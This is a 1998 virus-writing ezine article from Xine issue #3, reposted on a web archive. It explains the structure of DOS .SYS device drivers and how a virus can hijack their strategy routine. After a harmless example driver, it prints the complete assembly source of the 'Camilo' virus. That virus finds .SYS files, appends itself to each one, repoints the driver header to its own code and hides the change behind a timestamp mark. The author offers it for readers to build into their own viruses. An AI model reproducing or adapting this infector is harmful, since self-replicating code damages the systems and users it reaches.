Copy Link
Add to Bookmark
Report

Xine - issue #3 - Phile 106

eZine's profile picture
Published in 
Xine
 · 7 months ago
1

 
/-----------------------------\
| Xine - issue #3 - Phile 106 |
\-----------------------------/



Little SYS Infection Tutorial
ß ß ß ß ß ß ß ß ß ß ß ß ß ß ß
ÜÛ by Int13h ÛÜ
- - - - -


Well, here we will speak a bit about the infection of devices drivers, they
are really very easy to infect. When finishing this reading you will be able
to add infection of device drivers to your virus, then it will be more c00l :)
A .SYS phile, that is, a device driver, is a bridge of communication between
the software and hardware devices. The SYS philes are read from the CONFIG.SYS,
they are loaded in an own segment without PSP and are originated at offset 0.
They can be block or character devices. The structure of a device driver
follows:

HEADER
STRATEGY ROUTINE
INTERRUPT ROUTINE


The first part of a .SYS program is the header, which structure is:

Offset Length Description
------ ------ -----------
0 dd 32 bit pointer to next device driver header
4 dw Attribute
6 dw Pointer to strategy routine (offset)
8 dw Pointer to interrupt routine (offset)
A 8 bytes Name of the device


The first field is a 32 bit pointer to the device header of the next device,
this is because in a .SYS file can be concatenated various devices, and
the last in the chain has this relative offset of his header filled with
the value FFFF:FFFF. The attribute word is used to identify if the driver
is a character device or a block one. The next field, has the offset
in the file where the strategy routine is, a strategy routine must
save the location of the request header that DOS gives to it in ES:BX.
The next field must hold the offset of the interrupt routine handler,
which is the really working horse of the device driver, it must interpret
the request header and perform the commands that it read from there.
The last one, is a 8 bytes field that have the name of a character device
or the number of units of a block device. DOS loads device drivers
dynamically at boot time, reading them from the CONFIG.SYS, then a virus
can take control before some antiviruses. You could read more about SYS
structure in the chapter 9 of the Programmer's Technical Reference for MSDOS
and the IBM PC, a very nice shareware document in TXT format.

Just as an example, we will code a simple SYS file which displays a
message. Here it is:


8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
;
; SIMPLE SYS FILE, by Int13h
;
; Compile:
; tasm /zi /m3 stupid.asm
; tlink /m /v stupid.obj
; tdstrip -c stupid.exe
; ren stupid.com stupid.sys
; Install stupid.sys with a DEVICE command in your CONFIG.SYS
;
.model tiny
.code
org 0

Silly_SYS: ; SYS Header
Next_Device dd 0ffffffffh ; Just one device
Attribute dw 8000h ; Type: character device
Strategy dw offset Strategy_Routine
Interrupt dw offset Interrupt_Routine
NameDevice db 'SillySYS'


Strategy_Routine: ; Save ES:BX, address of the request header
mov word ptr cs:[Request_Header],bx
mov word ptr cs:[Request_Header+2],es
retf


Interrupt_Routine: ; The hearth of the program
push ds
push cs
pop ds ; DS=CS

; Here, we points ES:BX to the request header
les bx,dword ptr ds:[Request_Header]
mov al,byte ptr es:[bx+2] ; Take the command byte
test al,al ; Is 0? That means, initialization
jnz Go_Out ; Nope

; Here we set the segment and ending offset of the program
; and with a 100h we indicate to DOS that all was sucessfull
mov word ptr es:[bx+03h],0100h
mov word ptr es:[bx+0eh],offset Ending
mov word ptr es:[bx+010h],cs

; Display a stupid msg
mov cx,15
mov si,offset Message
lodsb
mov ah,0eh
xor bx,bx
int 10h
loop $-7

pop ds
Go_Out: sub ax,ax
retf ; Return

Request_Header dw 0,0 ; This will hold the address passed by DOS
Message db 'ABSURD WORLD!',13,10
Ending:

End Silly_SYS

8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8


Well. As you can see it is simple enough. Now, we will speak about the
infection matter. A virus can add itself to the end of file and point
the Next_Device field (offset 0) of the header to itself, then it will
be acting like a normal program, this is the way that Dark Angel of
Phalcom/Skim has choosed, and you can read about it in the number 9
of 40Hex magazine. For our infection purposes, we will hook the
strategy routine. This is the routine that grabs the pointer to the
request header (ES:BX) then you must be careful not changing these
registers, specially with the garbage if you are making a polymorphic virus.

Let's see:

BEFORE INFECTION:
> Header (Points to Strategy Routine)
> Strategy Routine
> Interrupt Routine


AFTER INFECTION:
> Header (Points to Virus)
> Strategy Routine
> Interrupt Routine
> Virus


In others words, we will follow the next algorithm:

1.) Open the SYS file.
2.) Read the header (10 bytes).
3.) Save in a buffer the original pointer to strategy routine.
4.) Move pointer to end of file (save AX value).
5.) Write virus there.
6.) Modify header, changing the pointer to the strategy routine
to the value in AX (file size), then it will point to virus.
7.) Move the pointer to the beginning.
8.) Write the modified header.
10.) Close the sucker.



And that is all. For some comments I can be reached at Int13h@antisocial.com.
Here, as example, follows a runtime appending SYS infector which works by
the method of reapoiting the strategy routine. Have fun!


8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
; Camilo Virus by Int13h
;
; To assemble:
; tasm camilo.asm /m3
; tlink camilo
;
; Run the program camilo.exe in a directory where there are some .SYS files.
; Generally it will hang after the infection of all the .SYS this is because
; when it returns control to the original strategy it points to offset 0, but
; the infected .SYS will run without any problem. Install one of the
; infected device drivers in your CONFIG.SYS as DEVICE=infected.sys and
; all will be ok. The virus is very simple and easy to understand, this is
; a tutorial, remember? :) Compile under TASM, I hate A86! :)

.model tiny
.code
jumps
org 0

VirusSize equ offset Heap-offset Camilo

Camilo: db 0b8h ; mov ax,original strategy routine offset
Vieja_Estrategica dw 0
push ax ; Push the address, then we will jump with a RET

push bx cx dx si di bp ds es

push cs cs
pop ds es ; DS=CS

call Delta
Delta:pop di ; Get the delta offset
sub di,offset Delta

mov ah,02fh ; Save original DTA
int 021h
mov word ptr [di+OriginalDTA],bx
mov word ptr [di+OriginalDTA+2],es

mov ah,01ah ; Set an own DTA (points to heap)
lea dx,[di+offset ViralDTA]
int 021h

mov ah,04eh ; Look for all the .SYS files in the
xor cx,cx ; current directory
lea dx,[di+offset Victims]
int 021h
jc PopThem

Verify: mov ax,03d02h ; Open the file found
lea dx,[di+offset ViralDTA+01eh]
int 021h
xchg bx,ax

mov ah,03fh ; Read 10 bytes
lea dx,[di+offset Buffer]
mov cx,10d
int 021h

mov si,dx
mov ax,word ptr [si]
cmp ax,'ZM' ; SYS with .EXE header?
je Close
inc ax ; Check if it header has the value 0xffff
jnz Close ; to see if is the only device in the file

mov ax,05700h ; Get date and time
int 021h
mov word ptr [di+Fecha],dx
mov word ptr [di+Hora],cx
and cl,00011111b
cmp cl,00011110b ; 30*2= 60? Look 4 infection mark
je Close

mov ax,04202h ; Move pointer to EOF
sub cx,cx
cwd
int 021h

mov cx,word ptr [si+6] ; Store the original strategy routine
mov word ptr [di+Vieja_Estrategica],cx
; Points strategy routine to virus code, at EOF (AX value)
mov word ptr [di+offset buffer+6],ax

mov ah,040h ; Append virus to file
mov cx,VirusSize
lea dx,[di+offset Camilo]
int 021h

mov ax,04200h ; Pointer to the beginning
xor cx,cx
cwd
int 021h

mov ah,040h ; Write the modified header
mov cx,10
lea dx,[di+offset Buffer]
int 021h

mov ax,05701h ; Restore date & time
db 0bah
Fecha dw 0
db 0b9h
Hora dw 0
and cl,11100000b ; Mark time as infected
or cl,00011110b ; Set seconds=30*2=60!
int 021h

Close: mov ah,03eh ; Close the sucker
int 021h

mov ah,04fh ; Call the next victim
int 021h
jnc Verify

PopThem:mov ah,01ah ; Restore original DTA
lds dword ptr dx,[di+offset OriginalDTA]
int 021h

pop es ds bp di si dx cx bx

xor ax,ax
ret ; Jump to the original strategy routine!

Buffer db 10 dup(0) ; We will read the header here

; Dedicated to Camilo Jos‚ Cela, a genial novelist from Spain
VirusName db ' [CAMILO by Int13h] '

Victims db '*.sys',0 ; Files to infect

HEAP label byte ; End of virus in the file
OriginalDTA dd 0 ; Old DTA address
ViralDTA db 43 dup (0) ; To use it in Find first/next functions

End Camilo
8< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8

INT13H
Paraguay, February 13, 1998

← previous
next →

Comments

1
guest's profile picture
@guest

I like the old PC-viruses. They were very popular in the 90s

7 months ago
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT